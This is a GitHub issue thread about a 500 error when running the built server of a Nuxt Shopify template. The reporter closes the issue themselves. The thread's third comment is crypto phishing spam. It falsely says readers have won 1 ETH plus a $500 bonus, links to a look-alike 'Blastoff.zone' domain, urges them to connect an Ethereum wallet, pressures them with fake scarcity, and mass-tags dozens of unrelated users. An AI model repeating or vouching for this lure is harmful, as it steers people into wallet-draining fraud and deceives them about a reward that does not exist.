### ISSUE TITLE
500: npm run build

### ISSUE THREAD

**Issue by dylansproule** [moritz-mm/nuxt-shopify-template#1]
Hello, great work on the project.

I am running into an issue trying to access the app after running:
npm run build

This is a clean clone, it builds fine and the output is all good:
"You can preview this build using node .output/server/index.mjs"

Running "node .output/server/index.mjs" yields errors and a 500 on the client, are you able to build?

Thanks

**Comment by dylansproule** [comment]
Closing

**Comment by isedwards** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
nafeef123, @eduherminio, @joelanders0, @Metastasis, @mohammadaminyza, @snoopanda, @jeongkyu, @jobily, @cbh32890, @merkt, @caitlynchan9, @s2je77, @Toroinpiedi97, @FeoNeo, @meganeskull, @fodrh1201, @Autodidactism, @tomislavpalijan, @HarisVidimlic19, @inecrom, @stulzq, @calmdowntweak, @s1mple, @TheRook, @useada, @jsshentu, @cosrah, @brandan1989, @succoDiPompelmo, @chiefman1, @adityavs, @psy0231, @AD-Aleksandrov, @softreactor, @RyannosaurusRex, @fabrizioff, @jsxz, @eiadxp, @firstlane, @surostig, @guogang81, @MinTALI, @jockoflocko, @Cambera, @Youngunclephil72, @Cyb3r-N1nja, @baajarmeh, @shad0w-cat, @orakle, @anurag-sachan
